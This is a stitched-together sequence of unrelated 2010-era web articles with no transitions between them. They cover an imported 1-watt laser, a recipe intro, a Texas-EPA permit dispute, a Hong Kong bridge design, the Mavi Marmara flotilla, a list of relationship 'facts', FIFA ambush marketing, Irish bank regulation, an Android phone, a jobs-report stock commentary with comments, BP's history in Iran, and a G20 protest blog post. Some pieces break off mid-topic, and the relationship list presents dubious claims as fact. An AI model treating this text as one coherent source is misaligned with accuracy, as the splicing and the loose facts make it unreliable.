An ultra high - powered hand held ' lightsaber ' on sale to anyone with a spare A$ 230 ( NZ $ 283 ) could land would - be Jedi Knights with a A $ 110,000 fine from Australian customs or severe retinal damage .
The Spyder III Pro Arctic laser is sold online from a company called Wicked Lasers in Shanghai , which boasts on its website of a massive 1
Watt of power , emitting a blue beam that is up to 4000 percent brighter than a 405 nm violet laser .
" High intensity laser pointers have been known to cause effects such as temporary or permanent blindness and disorientation if a beam is pointed directly at the eyes , " said an Australian Customs and Border Protection spokesperson , with a steep increase in the importing of laser pointers detected by the organisation in the past year .
Although the Wicked Lasers could not be contacted , it warns on its website that the new class 4 laser is " extremely dangerous " .
" Do n't let the Arctic name fool you , this laser possesses the most burning capabilities of any portable laser in existence .
That 's why it's also the most dangerous laser ever created , " it reads .
" If this laser does what is claimed then it is very dangerous , " says Tim McIntyre , a senior mathematics and physics lecturer from the University of Queensland .
According to Customs , written permission is required before importing any hand - held laser device with " an accessible emission level of greater than 1 milliwatt " .
The maximum penalty for importing these goods without approval is A$ 110,000 or three times the value of the goods , whichever is the greater , it says , which means that anyone in Australia who purchased the laser online could run into trouble .
The regulations were brought in a few years ago after six flights into Sydney were severely disrupted following a coordinated laser attack , forcing air - traffic controllers to change the flight paths of the six aircraft .
The Australian Customs spokesperson said there had been " a marked increase in the detection of laser pointers through mail and air cargo coming into Australia " , with 20,019 lasers detected for the year to 31 May 2010 , compared with 12,457 during the previous year .
Specialist equipment is used to test emission outputs of laser pointers when checking incoming mail , cargo and passengers , the spokesperson said , warning that some online retailers advertised laser pointers " as being under the 1 mW threshold when in fact they were many times over that limit , and therefore illegal to bring into Australia without a permit " .
Laser power ranges from very weak to very strong , said McIntyre .
" Lasers in barcode readers are low power and generally not dangerous but it is possible , with the appropriate permit , to purchase much more powerful lasers for scientific purposes .
" In the laser classification scheme , class 4 is the highest .
These are the most dangerous types of lasers and can very easily cause immediate and irreversible eye damage , " he said .
Wicked Lasers says on its website that it was founded by a group of laser enthusiasts " who have been searching all over looking for the highest powered , highest quality , affordable laser pointers " .
It also claims to be in the Guinness Book of World Records 2007 for having " the most powerful handheld laser in the world " .
" We wanted to create the world 's most powerful handheld laser - we succeeded and inadvertently set a world record in doing so , " it says , adding that the Spyder Series was its most advanced line of handheld lasers to date .
" We still have much to prove as there is still a world of possibilities in front of us .
Our quest to turn science fiction into reality has only just begun . "
However the website also issues the following warning to its customers : " Extremely dangerous is an understatement to the power of 1W of laser power .
It will blind permanently and instantly and set fire quickly to skin and other body parts , use with extreme caution and only when using the included eye protection . "
Bacon and Tomato Cups are always a hit at family events !
This is a delicious dish to pass or appetizer , the recipe which I got from my mother - in - law .
Every Christmas she makes these , and they are absolutely everyone ’s favorite .
My mother - in - law has seemed to perfect the Bacon and Tomato Cups recipe over the many years she ’s been making it , and even with the high demand , they never seem to run out !
She always has some hiding in the fridge or freezer , ready to be heated up and enjoyed on Christmas morning , too !
This recipe is to fulfill a Facebook fan ’s request named Amelia .
Amelia , hopefully this is something you were looking for !
Here at The Hungry Wife , we feel Bacon and Tomato cups are a perfect finger food for events or parties , and we ’re sure you will enjoy this delicious twist on this recipe .
We ’ve cut down the calories by slashing the mayo in recipe .
Also we ’ve provided a couple helpful hints to hopefully make this a tad easier to make !
Print
The battle between Texas pollution regulators and the Environmental Protection Agency grows more contentious and complex by the day .
Gov. Rick Perry accused the EPA on Wednesday of " seek[ing ] to destroy Texas ’s successful clean air program and threaten tens of thousands of good Texas jobs in the process . "
Environmentalists fired back , in their own news conference , threatening to sue the EPA if the agency does n't make the state shape up .
The back - and - forth follows the EPA 's announcement last week that it will strip the state of permitting authority for a huge refinery in East Corpus Christi .
The Texas Commission on Environmental Quality , the EPA said , was doing a shoddy job — and the agency threatened to take more plants away from TCEQ jurisdiction unless it changes its permitting system .
So does all the hubbub mean that Texas ' air is dangerous to breathe ?
Mostly no .
But exactly how safe it is and exactly who gets the credit are open questions .
In general , even the EPA acknowledges , the air above Texas cities is getting better .
" Progress has been made over the years , " says Dave Bary , a spokesman for the EPA 's Region 6 , the five - state area that includes Texas .
Only Dallas - Fort Worth , Houston - Galveston and Beaumont - Port Arthur are " non-attainment " areas for ozone , which means that they do not meet federal standards developed under the Clean Air Act .
The EPA forces improvements in city air quality by threatening to withhold federal transportation money , but it has never carried out this threat .
The governor 's office trumpets the improvements .
" The air Texans breathe today is significantly cleaner than it was in 2000 , " it said in a news release Wednesday .
Between 2000 and 2008 , the release said , Texans have cut ozone by 22 percent and nitrogen oxide by 27 percent — more than the national average .
Things are n't quite so simple , environmentalists say .
First , they argue , credit for improvement belongs to the EPA , not Texas .
" It was the feds who came in and said , we 're going to cut off transportation funding " unless things improve , says Tom " Smitty " Smith , the state director of the environmental and consumer advocacy group Public Citizen .
Federal requirements for cleaner cars and trucks have also been crucial .
Second , environmentalists say that the EPA could still be doing more to force improvements in Texas .
On Wednesday , the Sierra Club and Earthjustice sent out a notice of intent to sue the EPA unless it enforced ozone standards in Texas more strictly .
Enforcement has been slowed , they said , by foot - dragging by the Perry governor 's office — as well as lax regulation during the eight years that George W. Bush was in the White House .
The EPA plans to issue new ozone standards by the end of August , and when it does , more areas of the state — including Austin , San Antonio and northeast Texas — will be designated " non-attainment , " according to Neil Carman , the clean air program director for the Sierra Club 's Texas chapter .
Los Angeles , another badly polluted city , has improved faster than Texas cities , says Smith of Public Citizen .
In addition , according to Bary of the EPA , only one non-Texas city in his five - state region currently fails to meet EPA standards : Baton Rouge .
In addition to broad battles over urban air , environmentalists say problems persist with localized pollution hotspots .
Texas has the biggest industrial base in the country , and concerns center on the land and water near big plants such as refineries , chemical factories and cement kilns .
It is on these individual plants that the original battle — the one set off last week by the Corpus Christi refinery announcement — hinges .
The TCEQ issues vast numbers of permits every year , and only 120 are flexible permits , the commission says .
But the flexible permits are granted to some of the biggest plants , including the Corpus Christi refinery .
Environmentalists say these " flexible " permitting arrangements for big plants are an outrage , and the EPA seems to agree .
So what are flexible permits ?
In essence , they put a cap on the overall emissions of a facility .
The plant must meet the cap but can choose the most expeditious manner .
Texas has had flexible permitting in place since the mid-1990s ( environmentalists have been fighting the system ever since ) .
The EPA 's permitting procedures are more precise , specifying limits for the units within each facility .
The flexible permits create three problems , says Ilan Levin , the Texas program director for the Environmental Integrity Project , a nonprofit that advocates for better enforcement of environmental laws .
First , TCEQ sets the overall emissions cap too high — allowing higher total pollution levels than what EPA - recommended caps on individual units within the facility would permit .
" Those caps do n't really do anything ; they do n't mean anything , " Levin says .
Second , they may result in pollutants that are too concentrated in one area of the plant — harming a school , waterway or neighborhood nearby .
Third , the flexible permitting scheme means that emissions from units within the plant are not monitored and reported properly .
" There 's no other state out there that has anything like Texas 's flexible permit program , " Levin says .
" These flex permits do nothing .
They 're worthless . "
The TCEQ , not surprisingly , " strongly disagrees that Texas air permits violate the Clean Air Act , " as the agency 's chairman , Bryan Shaw , said in a statement last week .
Shaw also said that the environmentalists ' criticism of the flexible permitting scheme are " all incorrect . "
To ensure no particular unit of the plant has dangerous emissions , the TCEQ does “ worst - case modeling , " he said .
And plants must also provide emissions reports from individual units within the plant " upon request . "
More broadly , Perry and industry representatives fiercely argue that revoking the flexible permitting scheme will harm the big plants by depriving them of , well , flexibility .
In other words , the more rigid permitting scheme would be cumbersome and expensive .
The EPA is far too obsessed with process and not enough with results , TCEQ says .
Bary emphasizes that the Corpus Christi refinery issue — and the possibility of the EPA taking over permitting for more plants — should be considered separately from the larger ozone issues facing Texas cities .
Carman , for his part , offers an analogy : Decades ago , cars spewed filth into the atmosphere ; now they are fairly clean .
Why can't industrial plants — some of them built decades ago — also clean up at a similar rate ?
" I have been waiting for 15 years for this to hit the fan , " Carman says .
" It 's a huge mess . "
I do n't know if the Pearl River Necklace bridge is the craziest bridge ever designed , but it sure looks like the most twisted one .
It 's a clever solution to a very real and obvious problem , however .
Advertisement
The bridge is part of a proposal by NL Architects to connect Hong Kong with mainland China .
To do that , they had to solve a problem :
In Hong Kong , people drive on the left side of the road .
In mainland China , they drive on the right side .
Here 's the solution : A road flipper that physically twists the roads over each other .
Advertisement
I hope the project goes forward , because I 've always wanted to drive in a gigantic Scalextric .
[ Design Boom ]
Click to view
Israeli Deputy Foreign Minister Danny Ayalon appeared on CNN’s “ GPS ” show today , and once again changed the official story related to the Israeli attack on the Mavi Marmara aid ship two weeks ago .
Danny Ayalon
Ayalon now claims that 75 al - Qaeda linked mercenaries were on board the ship , heavily armed , and that they ambushed the Israeli troops before their eventual capture .
Last week Israel ’s official story was that 50 members of the Turkish military were on board the ship , armed with assault rifles .
It is unclear if Ayalon ’s 75 al - Qaeda are in addition to the 50 Turkish troops or not .
The 50 troops were themselves a revision from the initial story that the crew attacked them with makeshift bats .
In either case Israel ’s claims do n’t hold up to even casual scrutiny , as neither the assault rifles nor the arms , nor the Turkish soldiers nor the al - Qaeda members , were found on board the ship .
In fact Israel has already released every single person who was on board the aid ship , and none was charged with a single crime .
One would imagine Israel , which styles itself as the central front in the war on terror , would have had the presence of mind to detain 75 members of al - Qaeda if indeed their military had captured them .
There are a lot of weird things about us humans , and here ’s a list of facts that prove just that !
Some of these did you know relationship facts are not - so - obvious , and some are just ridiculous , but hey , they ’ve got a point !
Leaving your marriage ?
Only 10 % of people who leave their marriage end up marrying the person with whom they had an affair .
[ Read : Having an affair with a married man ]
Heated arguments
In an argument with your partner , when your heart rate goes over 100 beats per minute , you are incapable of hearing what your partner is trying to tell you .
Lesbians anyone ?
50 % of men claim they would feel comfortable if their girlfriend had a lesbian lover .
[ Read :
Why men love girls kissing ]
Lustful men
The average man sees five women a day with whom he would like to sleep with .
[ Read :
Why do men stare at women ? ]
Friends are important
40 % of women would consider dumping a boyfriend if her friends did n’t like him .
One hour
The time it takes for a woman to determine whether or not she wants to date a man again .
[ Read : Is he in love with you ? ]
15 minutes
The time it takes for a man to determine whether or not he wants to date a woman again .
[ Read :
How to tell if a guy likes you ]
Wednesday
The best day for a first date according to 41 % of singles .
[ Read : Best place to go on a first date ]
Goodbye kisses
Studies indicate that a man who kisses his wife goodbye when he leaves for work averages a higher income than the guy who does n’t do that .
Husbands who show affection are said to be more stable and methodical , and thus , end up receiving bigger pay checks .
French connection
What is known as a French Kiss in the English speaking world is called an English Kiss in France .
Chocolate love
Chocolate contains phenyl ethylamine , a natural substance that is believed to stimulate the same reaction in the body as falling in love .
Facing copulation
Humans are the only species that copulate face to face .
Words per day
On an average , women say over 7,000 words per day .
Men manage just over 2,000 .
The large cell
The largest cell in the human body is the ovum , or the egg cell .
It is about 1/180 inch in diameter .
The smallest cell in the human body is the male sperm .
It takes 175,000 sperms to weigh as much as a single egg cell .
[ Read :
What guys always notice on a date ]
[ Read :
What girls always notice on a date ]
Got any more fun relationship facts that you know ?
Share your thoughts !
At last , a human rights cause to draw even the most rugby - obsessed Afrikaner into the World Cup : some Dutch - effect women have been detained for wearing orange dresses at Soccer City .
Details of this rapidly developing international incident remain contested , with the oppressors ( the young ladies ) telling a slightly different tale to that being spun by the victim ( Fifa ) .
The fallout has seen ITV pundit Robbie Earle fired , and at this rate Prince Harry may well be implicated by dawn … but here are the facts , such as they can be established .
On Monday a group of 36 women attended the game between Holland and Denmark wearing orange dresses available from the leading Dutch beer brand Bavaria , although they bear no logo .
As one of the Holland fans tells The Star newspaper in Johannesburg : " We were sitting near the front , making a lot of noise , and the cameras kept focusing on us . "
At this point , accounts diverge .
According to the women , they were surrounded by stewards , who took them to be questioned by Fifa and the police .
The officers warned their mini-dressed suspects that they could be arrested for ambush marketing and spend six months in jail .
Then they drove them home after making copies of their passports and vowing to investigate further .
A Fifa spokesman , meanwhile , swears blind that the miscreants were allowed to stay in their seats until the end of the game , and that they were " young South African women being used by a large Dutch brewery " .
Think of them as advertising mules .
Fifa does concede that the 36 marketing insurgents were taken to what is described as a " facility " , where they were questioned by the authorities .
Meanwhile , it turns out that the entire block of tickets used by the ladies was allocated to our own Robbie Earle , who passed on his 50 – that 's right , 50 ! – free tickets to Bavaria beer .
He has now been fired by ITV .
Naturally , Bavaria beer is far from heartbroken at this high - profile outcome , with a spokesman observing of the logo - less dresses : " Fifa does n't have a monopoly on the colour orange . "
Or do they ?
Are there any other colours to which Fifa owns exclusive rights ?
What sort of prison stretch is one looking at for taupe ?
On these inquiries , alas , the organisation 's official spokesman is unwilling to be drawn – although he is keen to praise Fifa operatives , who apparently seized some flags bearing a Ghanaian company 's name at the Serbia v Ghana game on Sunday .
On the one hand , then , it is yet another triumph for Fifa 's chillingly efficient rights protection team .
But on the other , the whole episode affords another glimpse of the World Cup 's funny old moral universe .
Clearly you can't do what Robbie Earle did and keep your job ( unless you 're Fifa vice - president Jack Warner , who made an estimated $ 1 m flogging his 2006 World Cup tickets ) .
But we can all probably do without Fifa 's " fair play in marketing " lectures , which clothe commercial ruthlessness in the language of sporting decency , apparently oblivious to the impression given by wallpapering every stadium with signs that push BP or declare " We proudly accept only Visa " .
" The beautiful game , " Fifa reiterated yesterday , faces a deadly threat : " ambush marketing activities " by firms who wish " to secure themselves a slice of the [ World Cup ] rewards illicitly without offering any financial support in return " .
This sort of rabid protectionism might feel depressingly inevitable in the gleaming , super - efficient first world of tournaments such as Germany 2006 .
It is considerably more jarring in a country where the vast majority of people could never dream of affording the cheapest match ticket , and where unofficial local World Cup merchandise really does n't feel worth coming down upon like a ton of bricks .
Then again , Sepp Blatter & Co's priorities have always tended toward the skewed .
When racist chanting rained down on England players during a 2004 friendly against Spain in Madrid , Fifa imposed a risible £ 44,750 fine on the Spanish FA .
In that same year , Cameroon wore an unauthorised kit at the African Cup of Nations – an offence for which Fifa saw fit to fine the Cameroonian FA £ 86,000 .
So with Fifa 's charmless world view , there is every chance wearing a knock - off Bafana Bafana shirt counts as receiving stolen goods , and the Dutch ladies are advised to engage a top - flight lawyer as a matter of urgency .
The Central Bank has proposed to intervene in “ poorly thought through ” commercial decisions made by the banks under its new “ intrusive ” approach to regulation .
As part of measures to beef up its resources , the Central Bank is on track to increase its staff numbers by 150 to 1,300 this year , with a further 150 to 200 staff additions planned over the following two years .
It yesterday promised to be “ tenacious , but not pig- headed ” in defence of the public interest in a bid to stave off future financial crises .
In the new hands - on era of banking supervision , financial companies will be categorised according to the systemic risk they pose to the economy .
A system of early warning triggers , or red flags , will be developed to prevent a repeat of the banking meltdown .
The Central Bank is planning sweeping changes in response to the regulatory failures highlighted by new Central Bank governor Patrick Honohan and the economists Klaus Regling and Max Watson .
It will set up a specialist team to examine the business models employed by financial companies for signs of risky practices .
Under proposed new corporate governance rules , bank officials who do not meet fitness and probity standards may be subject to suspensions of up to six months and orders prohibiting them from carrying out particular functions .
It is expected that the Central Bank ’s new approach will involve intervention by the regulator when it deems that commercial decisions made by banks are imprudent .
“ Where the stakes are sufficiently high we will second guess commercial decisions as it is clear that poorly thought through business choices can later morph into prudential problems , ” the Central Bank said in a document circulated to banking executives yesterday .
One such intervention may be made if banks press ahead with reported plans for “ negative equity ” mortgages .
Under such loans , people who owe more on their mortgage than the value of their properties can switch the negative equity part of their existing mortgage to a new mortgage when they move house .
“ I think we would look at those products with some scepticism , ” Jonathan McMahon , the Central Bank ’s assistant director general for financial institutions supervision .
Mr McMahon added that failure to improve lending standards and examine its controls on consumer credit after the bubble - and - bust cycle of property prices would be “ unforgivable ” .
A review of the credit practices in new mortgage lending will be published next month and is expected to recommend tighter controls .
“ It is very difficult to have a soundly based financial system if people are in so much debt .
That just creates an enormous risk for the banks .
It also clearly creates risks for households and consumers if they can borrow to that extent , ” Mr McMahon said .
“ We have to contemplate doing some things that maybe sit slightly uncomfortably with the free market approach of the past , ” he said .
The Central Bank has identified four major areas where its supervision will immediately focus .
These are new credit standards for mortgages , remuneration policies at banks , risk management and general bank strategies , including their funding models .
Banks that have been slow to change their internal culture on key issues such as remuneration and that are otherwise failing to get to grips with past failures will act as “ a drag anchor on the recovery of public confidence in the wider banking system ” , said Mr McMahon .
“ There are still some laggards out there , ” he said .
It is hoped that “ deeply problematic ” business models , such as those at Quinn Insurance and Anglo Irish Bank , will be identified at an early stage by the regulator ’s new team of prudential analysts .
Under a proposed new system for assessing risky behaviour by the banks , it is proposing to categorise financial companies as high , medium - high , medium - low and low risk on indicators such as their level and quality of capital , liquidity , size of deposits and lending practices .
The Central Bank indicated yesterday that the recapitalisation of the domestic banks was proceeding as expected and that “ no material concerns ” had arisen from its preliminary assessment of foreign - owned banks based here .
For those looking to dip their toes in Android without splashing out on an expensive handset , the upcoming Garmin - Asus A10 might be for you .
The new phone / GPS hybrid , running on Android 1.6 , goes on sale on 7 June 2010 and is exclusive to Optus , at least initially .
The A10 will be available for free on either the AU$ 29 " Social " plan with 200MB of free data per month or the AU$ 49 business plan that includes 500 MB of monthly data ; both plans last for 24 months .
The A10 can also be purchased outright for AU$ 459 .
So , what can you expect in the box ?
The device comes with Garmin 's navigation software and a powered windscreen mount with built - in speakers included .
Maps are fully stored on the smartphone , as opposed to say Google Maps which gets all its data from the web .
One neat feature is that addresses mentioned in emails and in the contact list can be tracked down on the device with just a few clicks .
And as an internet - connected device , the A10 can search for fuel prices or perform internet - powered location searches .
The phone does n't feature a keypad , but does boast a 3.2 - inch capacitive touchscreen boasting a resolution of 480x320 .
Oh , and there 's 4GB of storage , not to mention a a microSD expansion slot .
And a 5 megapixel camera .
What else could you want ?
Well , maybe a different provider .
But to each his own !
Stock Market Precipitous Sell - off , Was the Jobs Report That Bad ?
A precipitous sell - off in the stock market took place last Friday ( Chart 1 ) as the Labor Department ’s May monthly report showed that job growth was weak in the private sector .
The NYSE had to invoke “ Rule 48 ″ again , marking the fifth time this year it has used the rare rule , which is intended to help smooth the opening following volatile futures action .
So the employment report disappointed , but was it really as bad as evidenced by such a disproportionate selloff ?
Market Mis-Expectation
The answer is no , it only failed relative to an incredibly optimistic benchmark set by some economists and the media , not to mention the Obama administration who mismanaged expectations .
The headline numbers for May do suggest reason for optimism — employers added 431,000 jobs and the jobless rate fell to 9.7 % , from 9.9 % in April .
However , the majority of focus is fixated on that almost all of the growth came from the 411,000 temporary workers hired by the Census Bureau , and the private sector created 41,000 positions , far short of the over - optimistic expectations for 150,000 to 180,000 jobs .
Hype & Over-Reaction
One needs to bear in mind that the big picture for the employment report should be based upon the following rationale :
Are we better off in terms of job losses compared to a year ago , six months , three months , last month etc . ?
In other words , are we trending in the right direction , from 500,000 job losses each month to finally being net positive in job gains ?
There is a tendency on Wall Street and the world in general to overreact to news events , and economic reports are not immune to this phenomenon .
This kind of knee - jerk reaction to every micro bit of news is part and parcel of the sensationalistic news media model that has been employed to drive ratings and sell advertising space .
This often distorts the true significance of news events , and in the case of the latest jobs report , the underlying positive trend that is taking place in the employment environment .
If “ Employment ” Were A Stock
If one was trading this stock called ‘ Employment ’ and we graphed the year over year numbers on a chart it would appear quite bullish .
( Chart 2 )
In fact , this graphed line would be a trend trader`s dream stock to trade as we are in a marked uptrend which is steadily rising at a right angle , and will probably remain bullish , putting in higher highs and higher lows , for the next five years .
Big Picture - Trending Up
So the big picture of the employment trend needs to be the key takeaway from the latest jobs report , and not the extreme short - term reactionary view represented by Friday`s selloff in the market .
Eventually Corporations will start to feel more confident in the economic recovery to start putting those profits to work in pursuing new growth opportunities which require more risk .
And these new growth opportunities will require droves of new employees which will further reinforce the positively trending employment reports for the next five years , thus reducing another jobs figure some economists tend to focus on - the number of Americans out of work for 27 or more weeks -- which remained at historical high .
Selloff = Bargains
With interest rate likely to remain zero for the rest of the year as one benefit for US investors due to another over - hyped news scenario in the European sovereign deficit scare , and speculations of stimulus 2.0 , there are some real bargains in the market which will be snapped up ahead of the next earnings cycle as corporate productivity and profits are quite robust right now in the business cycle .
Overall , the labor market is trending in the positive direction .
Smart investors would focus on the fact that the US economy is improving vs. three months ago , and take the recent selloff as bargain hunting opportunity , particularly in the resource sector , to enhance your portfolio .
Disclosure : No Positions
Dian L. Chu , M.B.A. , C.P.M. and Chartered Economist , is a market analyst and financial writer regularly contributing to Seeking Alpha , Zero Hedge , and other major investment websites .
Ms. Chu has been syndicated to Reuters , USA Today , NPR , and BusinessWeek .
She blogs at Economic Forecasts & Opinions .
© 2010 Copyright Dian L. Chu - All Rights Reserved Disclaimer :
The above is a matter of opinion provided for general information purposes only and is not intended as investment advice .
Information and analysis above are derived from sources and utilising methods believed to be reliable , but we cannot accept responsibility for any losses you may incur as a result of this analysis .
Individuals should consult with their personal financial advisors .
© 2005-2019 http://www.MarketOracle.co.uk - The Market Oracle is a FREE Daily Financial Markets Analysis & Forecasting online publication .
Comments
not recklessly optomistic
06 Jun 10 , 19:50 really now ?
the " recovery " is fueled by nothing more than consumer 's extra money from stopping their mortgage payments consumer 's extra money from extended unemployment bennefits stimulus bill and fed 1.5 trillion purchases of bonds high frequency trading desks and fed liquidity as well as accounting changes ... propping up a stock market that has seen corporation 's selling their own stock because they know just how bad things are .
now the first shot of opiates is wearirng off .... the stimulus is wearing off and as the fog clears enough we could hear the rumbles of soverign debt defaults ..... and speculating investment banks / hedge funds are cashing in on rising CDS spreads .
the only question that remains as to where this casino will go next is how much extra cash do the big banks have to boost stocks up higher when they are saving a ton of it to make sure there capital ratio's will be in line when commercial real estate craps the bed in 2011 - 12 - 13
gAnton
06 Jun 10 , 22:28 The End Game
It 's obvious that much of the investment public is in denial .
The end is clear and the jig is up -- what is n't clear is the timing .
This so called current economic crisis " began " ( i.e. " became apparent " ) approximately two years ago .
The apparent basic cause was and is excessive debt , and the US and world debt is getting more out - of - hand every day .
Things are much , much worse and unsustainable than they were two years ago , and we are continuing at an accelerating clip in a downward path to the final and inevitable destruction of our economy .
If the end is so clear , why is pronostication of the approximate end date so very difficult ?
I think that there are basically two reasons :
Firstly , it is an extremely complicated situation complete with innumerable number of astonishing surprises , and world governments are doing whatever they can to delay the inevitable .
Secondly , the only way of understanding the current complex situation is based on quantatative data , and much of the germane data is hidden , distorted , prefabricated , or misunderstood .
Most of the government money has not been used to treat underlying economic problems -- it has been used to obfuscate the true nature of the situation .
To frustrated Americans who have begun boycotting BP : Welcome to the club .
It 's great not to be the only member any more !
Does boycotting BP really make sense ?
Perhaps not .
After all , many BP filling stations are actually owned by local people , not the corporation itself .
Besides , when you 're filling up at a Shell or ExxonMobil station , it 's hard to feel much sense of moral triumph .
Nonetheless , I reserve my right to drive by BP stations .
I started doing it long before this year 's oil spill in the Gulf of Mexico .
My decision not to give this company my business came after I learned about its role in another kind of " spill " entirely -- the destruction of Iran 's democracy more than half a century ago .
The history of the company we now call BP has , over the last 100 years , traced the arc of transnational capitalism .
Its roots lie in the early years of the twentieth century when a wealthy bon vivant named William Knox D'Arcy decided , with encouragement from the British government , to begin looking for oil in Iran .
He struck a concession agreement with the dissolute Iranian monarchy , using the proven expedient of bribing the three Iranians negotiating with him .
Under this contract , which he designed , D'Arcy was to own whatever oil he found in Iran and pay the government just 16 % of any profits he made -- never allowing any Iranian to review his accounting .
After his first strike in 1908 , he became sole owner of the entire ocean of oil that lies beneath Iran 's soil .
No one else was allowed to drill for , refine , extract , or sell " Iranian " oil .
" Fortune brought us a prize from fairyland beyond our wildest dreams , " Winston Churchill , who became First Lord of the Admiralty in 1911 , wrote later .
" Mastery itself was the prize of the venture . "
Soon afterward , the British government bought the D'Arcy concession , which it named the Anglo - Persian Oil Company .
It then built the world 's biggest refinery at the port of Abadan on the Persian Gulf .
From the 1920s into the 1940s , Britain 's standard of living was supported by oil from Iran .
British cars , trucks , and buses ran on cheap Iranian oil .
Factories throughout Britain were fueled by oil from Iran .
The Royal Navy , which projected British power all over the world , powered its ships with Iranian oil .
After World War II , the winds of nationalism and anti-colonialism blew through the developing world .
In Iran , nationalism meant one thing : we 've got to take back our oil .
Driven by this passion , Parliament voted on April 28 , 1951 , to choose its most passionate champion of oil nationalization , Mohammad Mossadegh , as prime minister .
Days later , it unanimously approved his bill nationalizing the oil company .
Mossadegh promised that , henceforth , oil profits would be used to develop Iran , not enrich Britain .
This oil company was the most lucrative British enterprise anywhere on the planet .
To the British , nationalization seemed , at first , like some kind of immense joke , a step so absurdly contrary to the unwritten rules of the world that it could hardly be real .
Early in this confrontation , the directors of the Anglo - Iranian Oil Company and their partners in Britain 's government settled on their strategy : no mediation , no compromise , no acceptance of nationalization in any form .
The British took a series of steps meant to push Mossadegh off his nationalist path .
They withdrew their technicians from Abadan , blockaded the port , cut off exports of vital goods to Iran , froze the country 's hard - currency accounts in British banks , and tried to win anti-Iran resolutions from the U.N. and the World Court .
This campaign only intensified Iranian determination .
Finally , the British turned to Washington and asked for a favor : please overthrow this madman for us so we can have our oil company back .
American President Dwight D. Eisenhower , encouraged by his Secretary of State John Foster Dulles , a lifelong defender of transnational corporate power , agreed to send the Central Intelligence Agency in to depose Mossadegh .
The operation took less than a month in the summer of 1953 .
It was the first time the CIA had ever overthrown a government .
At first , this seemed like a remarkably successful covert operation .
The West had deposed a leader it did n't like , and replaced him with someone who would perform as bidden -- Mohammad Reza Shah Pahlavi .
From the perspective of history , though , it is clear that Operation Ajax , as the operation was code - named , had devastating effects .
It not only brought down Mossadegh 's government , but ended democracy in Iran .
It returned the Shah to his Peacock Throne .
His increasing repression set off the explosion of the late 1970s , which brought to power Ayatollah Khomeini and the bitterly anti-Western regime that has been in control ever since .
The oil company re-branded itself as British Petroleum , BP Amoco , and then , in 2000 , BP .
During its decades in Iran , it had operated as it pleased , with little regard for the interests of local people .
This corporate tradition has evidently remained strong .
Many Americans are outraged by the relentless images of oil gushing into Gulf waters from the Deepwater Horizon well , and by the corporate recklessness that allowed this spill to happen .
Those who know Iranian history have been less surprised .
oshipeya's Blog June 29 , 2010
copyedited fact checked [ ?]
Reviewed by Toronto Media Co-op editors .
Debunking veteran activist Judy Rebick 's G20 Toronto police car conspiracy theory
Blog posts reflect the views of their authors .
Vancouver anti-G20 solidarity photo by Stephen Hui Vancouver anti-G20 solidarity photo by Stephen Hui
Debunking veteran activist Judy Rebick 's G20 Toronto police car conspiracy theory
By Oshipeya
Coast Salish Territory , Vancouver , Canada
Tuesday , June 29 , 2010
Veteran Toronto activist Judy Rebick claimed she was shocked by images of police cars burning and corporate windows being smashed at the G20 protests in Toronto on Saturday .
In her Rabble .ca article entitled “ Toronto is burning !
Or is it ? ” , she even went so far as to state that , “ none of us had ever seen Toronto like this ” .
Exactly how “ veteran ” of an activist is Rebick then ?
Has she really not even heard of the Queen 's Park riot of June 2000 or the Rodney King solidarity riot along Yonge Street in 1992 ?
Surely , that can't be the case .
Then it must be the supposed extremity of the burning police cars , more so than the broken windows or attacks on cops .
1992 Toronto riot :
http://www.youtube.com/watch?v=9WZtRw9II2s
But Rebick would n't even need to be an activist , let alone a veteran one , to have at least heard about or seen images of many more burning police cars in not - so - far - away Montreal a few years ago after a first round hockey playoff win , or the rioting and looting in that city after this year 's second round victory , or the rioting after the Montreal police killing of the young Fredy Villanueva .
Judy Rebick 's conspiracy theory article at Rabble.ca :
http://rabble.ca/blogs/bloggers/judes/2010/06/toronto-burning-or-it
Rebick is trying to convince us that the Toronto cops allowed the black bloc to run wild , that the cops purposely left their cars to be trashed and that they could have arrested the black bloc earlier on when their was n't such a big crowd for them to mesh with .
She 's tried this not only with her Rabble .
ca article but with her appearance on a CP24 news program .
CP24 interviews Judy Rebick :
http://www.youtube.com/watch?v=7iaG1H0pDxY
The problem being that she does n't know what she 's talking about and is contradicted by numerous sources of photographic , video and verbal evidence which show the scene on Queen near Spadina , where a police officer still inside his vehicle is under attack from all sides by black blocers , with other police scrambling in and one even tripping in her attempt to save her co-worker .
Objects are still being thrown at the police and the officer who was inside later tells the Toronto Star that he was hit in the back of the head with a pole .
Black bloc attacks cop car with cop inside it at 0:42 seconds :
http://www.youtube.com/watch?v=nOjGdvju-po
Toronto Star article :
http://www.thestar.com/news/gta/torontog20summit/article/829587--the-fir...
The car was not burned until later , when the black bloc was gone and ordinary and not - so - ordinary citizens were having fun playing with the police equipment .
Citizens having fun with trashed police car :
http://www.youtube.com/watch?v=KDf8u5NATDY
Another video shows a single cop running in to attack the black bloc as they smash police cars that would also be burned in the financial district .
Big - time - hero cop attacks black bloc by himself at 3:12 seconds :
http://www.youtube.com/watch?v=xKIeDpqZdFI
There is also video and photo of a line of riot police blocking the black bloc and other demonstrators from continuing at one intersection .
One of the police raids on houses prior to the riot was described by police as having busted a black bloc affinity group before they had a chance to join the demonstration and do their dirty deeds .
Of course , we should n't take the cops ' or the media 's word for it , but at least this , and the many police visits and instances of harassment leading up to the summit , shows that the cops were trying to intimidate and limit the black bloc as much as they could .
The bloc was part of the large crowd at the start of the demonstration , and the bloc , unlike peaceful protesters , is known to fight back , so if the cops had tried to arrest them all at the beginning it could have provoked more serious fights and rioting .
In addition , the black bloc tactic is not illegal in itself , so it would have appeared undemocratic for the cops to mass arrest them before they had committed any crimes .
It 's far better for the police and their bosses ' democratic image to try to intimidate anyone from taking part in the black bloc beforehand , out of the public spotlight , and then use cameras and plain - clothes or black - bloc - dressed infiltrators to do surveillance of the black bloc during the demonstration and to use that to do snatch - squad arrests during or after the demo .
Although the cops are known liars , we can see that there may be some truth to their claim that they had committed much in the way of resources to defending the fence and the summit site .
They may not have expected the route of the bloc , since it was thought to have been trying to ultimately go to the fence .
They also committed many resources to Queen 's Park , a site where they could anticipate making arrests more easily .
The various groups of protesters and their different and sometimes chaotic movements might have presented some difficulty .
And , as mentioned , the black bloc may have fought back at any point , creating even more chaos and more violent imagery .
A mass arrest attempt that did n't manage to net most of the black bloc could have left the majority of the bloc outside the net to go on about their dastardly business .
Rebick apparently would rather the black bloc did n't exist and that everyone just protested peacefully .
But do n't the police allow for peaceful protest , at least until the black bloc has done its thing ?
So would n't that make the peaceful protests the first conspiracy and the black bloc the secondary one ?
